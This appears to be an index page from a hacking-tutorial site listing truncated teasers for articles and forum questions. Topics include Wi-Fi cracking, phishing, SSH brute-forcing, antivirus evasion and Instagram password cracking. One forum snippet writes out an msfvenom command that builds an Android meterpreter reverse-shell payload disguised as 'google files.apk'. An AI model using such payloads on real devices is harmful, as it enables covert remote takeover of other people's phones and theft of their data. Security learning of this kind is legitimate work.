With just a few taps, an Android phone can be weaponized into a covert hacking device capable of running tools such as Nmap, Nikto, and Netcat — all without rooting the device. UserLAnd, created by UserLAnd Technologies, is a completely free Android app that makes installing Linux distributions quic ...more
It's common for IoT devices like Wi-Fi security cameras to host a website for controlling or configuring the camera that uses HTTP instead of the more secure HTTPS. This means anyone with the network password can see traffic to and from the camera, allowing a hacker to intercept security camera foot ...more
Nmap is possibly the most widely used security scanner of its kind, in part because of its appearances in films such as The Matrix Reloaded and Live Free or Die Hard. Still, most of Nmap's best features are under-appreciated by hackers and pentesters, one of which will improve one's abilities to qui ...more
As pentesters and hackers, we're going to be working with text frequently — wordlists, configuration files, etc. A lot of this we'll be doing on our machine, where we have access to whatever editor we prefer. The rest of it will be on remote machines, where the tools for editing will be limited. If ...more
Computers all over the world rely on a program called "libssh" to use the SSH communications protocol, which allows trusted users to log in and administer computers remotely. Due to a flaw in libssh, fooling a computer into granting SSH access is as easy as telling it you already have permission. Th ...more
Many online users worry about their accounts being breached by some master hacker, but the more likely scenario is falling victim to a bot written to use leaked passwords in data breaches from companies like LinkedIn, MySpace, and Tumblr. For instance, a tool called H8mail can search through over 1 ...more
When setting up a Raspberry Pi, it's easy to overlook changing the default password. Like many IoT devices, the Raspberry Pi's default Raspbian operating system installs with a widely-known default password, leaving the device vulnerable to remote access. Using a tool called rpi-hunter, hackers can ...more
When we think about operating systems, we tend to view them from the perspective of a user. After all, most of us have spent a substantial amount of time on our computers, and so we've become more than acquainted with the ins and outs of whatever system we have running on our personal device. But th ...more
A man-in-the-middle attack, or MitM attack, is when a hacker gets on a network and forces all nearby devices to connect to their machine directly. This lets them spy on traffic and even modify certain things. Bettercap is one tool that can be used for these types of MitM attacks, but Xerosploit can ...more
Kali Linux has come a long way since its BackTrack days, and it's still widely considered the ultimate Linux distribution for penetration testing. The system has undergone quite the transformation since its old days and includes an updated look, improved performance, and some significant changes to ...more
Kali Linux is the go-to Linux distribution for penetration testing and ethical hacking. Still, it's not recommended for day-to-day use, such as responding to emails, playing games, or checking Facebook. That's why it's better to run your Kali Linux system from a bootable USB drive. The hacker-friend ...more
A PirateBox creates a network that allows users to communicate wirelessly, connecting smartphones and laptops even when surrounding infrastructure has been disabled on purpose or destroyed in a disaster. Using a Raspberry Pi, we will make a wireless offline server that hosts files and a chat room as ...more
There are hidden Wi-Fi networks all around you — networks that will never show up in the list of available unlocked and password-protected hotspots that your phone or computer can see — but are they more secure than regular networks that broadcast their name to any nearby device? The short answer is ...more
If you're getting into automation, Bash scripting is usually the way to go. However, there are a couple of limitations, and one of them is logging into another device like a Raspberry Pi and running a script automatically. To help in those situations, we're going to automate delivering an SSH payloa ...more
Bash scripting is a convenient way to automate things on any Linux system, and we're going to use it here to automate certain tasks we use all the time. Bash is a simple language for stringing together several different Linux utilities. Its simplicity makes it easy for beginners to create lots of sc ...more
Social media accounts are a favorite target for hackers, and the most effective tactics for attacking accounts on websites like Facebook, Instagram, and Twitter are often based on phishing. These password-stealing attacks rely on tricking users into entering their passwords into a convincing fake we ...more
Airgeddon is a multi-Bash network auditor capable of Wi-Fi jamming. This capability lets you target and disconnect devices from a wireless network, all without joining it. It runs on Kali, and we'll cover installing, configuring, and using its jamming functionalities on a small, inexpensive Raspberr ...more
Besside-ng is the hidden gem of the Aircrack-ng suite of Wi-Fi hacking tools. When run with a wireless network adapter capable of packet injection, Besside-ng can harvest WPA handshakes from any network with an active user — and crack WEP passwords outright. Unlike many tools, it requires no special ...more
After installing Ubuntu as your primary OS, you should have protected against USB Rubber Ducky payloads, defended against hard drive forensics, and reduced the overall attack surface against physical strikes. When defending against network-based attacks, you'll want to minimize hardware disclosures, ...more
Windows 10 and macOS have poor reputations when it comes to customer privacy and user policies. Our hacking Windows 10 and hacking macOS articles might make it seem like a reasonably secure operating system doesn't exist. But I'm here to tell you that there is a viable alternative that could provide ...more
Withstanding an attack from a motivated hacker is one of the most important responsibilities a system administrator must undertake. This is especially true for websites that may contain sensitive customer information and a high volume of users. So it's important for a sysadmin to take proactive meas ...more
While there are completely legitimate reasons to use Bitcoin, it's also used by terrorists, drug dealers, and other shady people that need to be investigated. That's where SpiderFoot comes in, which has a command-line interface to search for Bitcoin wallet addresses on a website and query the balanc ...more
What appears to be an ordinary MP4 may have been designed by an attacker to compromise your Linux Mint operating system. Opening the file will indeed play the intended video, but it will also silently create a connection to the attacker's system. Understanding the AttackWhile this article uses Linux ...more
Hi there! I'm Joash Jeshurun & this is my first writing on this website. Today, in this post I'll reveal how hackers try to gain access into Android devices and cause disastrous effects. Today's world seems to be completely connected under the influence of the Internet (International Network). I ...more
I installed kali Linux on my desktop selecting gdm3 and it worked perfect after the installation. However after I have updated and upgraded, I restarted my pc and it gets stuck with a queue of lines ending with "started gnome display manager". After I press Alt + F2 I can login using my details. I t ...more
Hello, fellow hackers! Today I am going to show you just how easy it is to spoof E-Mails and impersonate any E-Mail address. Because of how easy it is to do, anyone with five minutes of free time can send malicious E-Mails to you while pretending to be your boss, teacher, SO, etc. You can probably g ...more
Hello techies? I'm using Debian, Kali to be exact. Whenever I try sudo su, it executes the /usr/bin/zsh and I don't know how I set this or how to bring it back to normal. Someone to hel ...more
Hello techies? I'm using Debian, Kali to be exact. Whenever I try sudo su, it executes the /usr/bin/zsh and I don't know how I set this or how to bring it back to normal. Someone to help ...more
I'm trying to use Alfa awus1900 for WiFi hacking bit it doesn't does the job and after turning on monitor mode the still shows as wlan0 in both the modes in monitorias well as manager mode so do some kindly help me with the homework And I'm using kali Linus 2020.03 with all updated ...more
A dead man's switch is a fairly simple concept. If you don't perform a specific task before a set amount of time, it'll perform a specific action you set. They can be handy not just for hackers but for everyone who wants to protect themselves, someone else, or something tangible or intangible from h ...more
As we've seen with other tools and utilities, administrators typically use certain things to do their job more efficiently, and those things are often abused by attackers for exploitation. After all, hacking is just the process of getting a computer to do things in unexpected ways. Today, we will be ...more
One of the most exciting things as an ethical hacker, in my opinion, is catching a reverse shell. But often, these shells are limited, lacking the full power and functionality of a proper terminal. Certain things don't work in these environments, and they can be troublesome to work with. Luckily, wi ...more
Hackers often find fascinating files in the most ordinary of places, one of those being FTP servers. Sometimes, luck will prevail, and anonymous logins will be enabled, meaning anyone can just log in. But more often than not, a valid username and password will be required. But there are several meth ...more
Browser extensions are extremely useful since they can expand web browsers like Google Chrome and Mozilla Firefox beyond their built-in features. However, we don't always know who's behind a browser add-on or what it's doing beyond what's advertised. That's where ExtAnalysis comes into play. ExtAnal ...more
Web applications are becoming more and more popular, replacing traditional desktop programs at an accelerated rate. With all these new apps out on the web comes various security implications associated with being connected to the internet where anyone can poke and prod at them. One of the simplest, ...more
Hi I wanted to know how I can Enable Monitor Mode on TL-WN722N V2 Using Kali Nethunter (Phone) And How Can I Install It's Drivers on My Phone Any help would be great please help me:) ...more
Sudo is a necessity on most Linux systems, most of which are probably being used as web servers. While the principle of least privilege is typically applied, sudo misconfigurations can easily lead to privilege escalation if not properly mediated. Which brings us to SUDO_KILLER, a tool used to identi ...more
You might be giving out your name to every stranger you see, and you don't even know it. That iPhone of yours has a name — generally a combination of your first name and device model — and it broadcasts it to others via AirDrop, Personal Hotspot, Bluetooth, Wi-Fi, and other connections. Sure, it's u ...more
I'm new to Linux, and recently tried WiFi hacking with the built-in tool in kali Linux i.e Wifite. I managed to capture handshake file. But the application couldn't crack the password with the help of brute force. Is there any other way I can decrypt the password from the .CAP file generated??? Plea ...more
Privilege escalation is the technique used to exploit certain flaws to obtain elevated permissions relative to the current user. There are a vast number of methods out there to go from user to root on Linux, and keeping track of them all can be difficult. This is where automation comes into play, an ...more
In the first guide, we laid the groundwork for our ultimate goal of uploading and running the unix-privesc-check script on our target. We identified an input field vulnerable to SQL injection and utilized Sqlmap to set up a file stager on the server. Now, we're ready to upload files and execute the ...more
Microsoft's built-in antimalware solution does its best to prevent common attacks. Unfortunately for Windows 10 users, evading detection requires almost no effort at all. An attacker armed with this knowledge will easily bypass security software using any number of tools. As Microsoft's antimalware ...more
First we needed to create a payloadwe can do this by executing the following command in Kali linux Terminal msfvenom -p android/meterpreter/reverse_tcp lhost=(your ip adress,get by typing ifconfig or sudo ifconfig in terminal) lport=4444 R > /home/kali/google files.apk then open metasploitmsfcons ...more
I've been trying to get the hang of Kali Linux as a command line virgin, and as expected I made a mistake by editing some file I wasn't supposed to. Everytime I would update/install I would get Ignoring file 'some-ppa.list.save.1' in directory '/etc/apt/sources.list.d/' as it has an invalid filename ...more
i'm new to this it's may silly if i install kali linux it will erase my hard disk and my windows ? ...more
The internet has undoubtedly changed the way we work and communicate. With technological advances, more and more people can collaborate on the web from anywhere in the world. But this remote-friendly environment inherently brings security risks, and hackers are always finding ways to exploit systems ...more
The art of fuzzing is a vital skill for any penetration tester or hacker to possess. The faster you fuzz, and the more efficiently you are at doing it, the closer you come to achieving your goal, whether that means finding a valid bug or discovering an initial attack vector. A tool called ffuf comes ...more
I have download Kali Linux on Android. I was trying "How to hack android remotely" tutorial. But, after creating the app file, I was not able to locate it. It was not in my phone's internal memory. It was in the root folder. I tried to copy it into my phone's internal memory, but I was not able to f ...more
Last week I flashed Offensive Security's latest release of Kali Linux (2020.3) for Raspberry PI 4 and have spent probably close to 10 hours now trying to get it to connect to my 2.4G wireless network to no avail. I can get it to connect after login (when I login using my screen and keyboard), and ca ...more
OpenBSD implements security in its development in a way that no other operating system on the planet does. Learning to use the Unix-like operating system can help a hacker understand secure development, create better servers, and improve their understanding of the BSD operating system. Using Virtual ...more
Identifying security software installed on a MacBook or other Apple computer is important to hackers and penetration testers needing to compromise a device on the network. With man-in-the-middle attacks, packets leaving the Mac will tell us a lot about what kind of antivirus and firewall software is ...more
Everybody knows not to store sensitive information in unencrypted files, right? PDFs and ZIP files can often contain a treasure trove of information, such as network diagrams, IP addresses, and login credentials. Sometimes, even certain files that are encrypted aren't safe from attackers. That's whe ...more
Instagram is one of the most widely used social media applications. I am pretty confident that at least one of your friends or you are using it pretty much everyday. Today I am going to show you how a hacker could crack someone's Instagram password using a script called Instainsane. Download Instai ...more
If you're ever in a situation where you need to take a peek at the wireless spectrum, whether it's for Bluetooth or Wi-Fi devices, there's a fascinating Python 3-based tool called Sparrow-wifi you should check out. It's cross-platform, easy to use, and has an impressive GUI that shows you the signal ...more
Hi Null Byte,After going through numerous articles, forums and videos all over internet, i can not find any help on the subject .Brief of problem: Trying to make kali linux persistent usb. Getting boot error in persistence mode.Details: Following procedure was adopted to make persistent live usb USB ...more
SSH is one of the most common protocols in use in modern IT infrastructures, and because of this, it can be a valuable attack vector for hackers. One of the most reliable ways to gain SSH access to servers is by brute-forcing credentials. There are a few methods of performing an SSH brute-force atta ...more
Internet Relay Chat, or IRC, is one of the most popular chat protocols on the internet. The technology can be connected to the Tor network to create an anonymous and secure chatroom — without the use of public IP addresses. IRC servers allow one to create and manage rooms, users, and automated funct ...more
i donot have a external wireless adapter that supports monitor mode and i wanted to practise MITM attacks so i wanted to know does MITM attack needs monitor mode to be enabled? i am using kali on vmware i can perform attack on another virtual os on my pc with nat but can i attack other device on my ...more
Hackers are always seeking zero-day exploits that can successfully bypass Windows 10's security features. There has been extensive research into creating undetectable malware and entire GitHub projects dedicated to automating the creation of undetectable payloads such as WinPayloads, Veil v3, and Th ...more
It's a common misconception that iPhones are impervious to cyberattacks and "more secure" than Android. And when an iPhone does get hacked, it's nearly impossible to tell that it happened. Vulnerabilities in iOS are common, and Apple tries to tackle them with each security update it releases. To get ...more
